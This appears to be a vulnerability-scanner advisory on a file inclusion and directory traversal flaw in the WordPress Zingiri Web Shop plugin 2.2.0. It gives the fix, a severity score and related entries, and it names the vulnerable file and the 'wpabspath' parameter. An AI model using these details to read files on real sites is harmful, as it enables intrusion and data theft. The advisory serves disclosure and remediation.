WordPress Zingiri Web Shop Plugin Remote File Inclusion Vulnerability Network Vulnerability

Summary

This host is installed with WordPress Zingiri Web Shop Plugin and is prone to remote file inclusion vulnerability.

Impact

Successful exploitation could allow attackers to perform directory traversal attacks and read arbitrary files on the affected application. Impact Level: Application

Solution

Upgrade to WordPress Zingiri Web Shop Plugin Version 2.2.1 or later. For updates refer to http://wordpress.org/extend/plugins/zingiri-web-shop/download/

Insight

The flaw is due to improper validation of user-supplied input passed via 'wpabspath' parameter to /wp-content/plugins/zingiri-web-shop/fws/ajax/ init.inc.php, which allows attackers to read arbitrary files via a ../(dot dot) sequences.

Affected

WordPress Zingiri Web Shop Plugin Version 2.2.0

References

http://packetstormsecurity.org/files/view/105237/wpzingiri-rfi.txt

Updated on 2015-03-25

Severity

Classification

CVSS	Base Score: 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P

Related Vulnerabilities

Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object Remote Code Execution
Advanced Guestbook Index.PHP SQL Injection Vulnerability
Adobe ColdFusion Information Disclosure Vulnerability
AlstraSoft AskMe Pro 'forum_answer.php' and 'profile.php' Multiple SQL Injection Vulnerabilities
AWStats Totals 'sort' Parameter Remote Command Execution Vulnerabilities

Take action and discover your vulnerabilities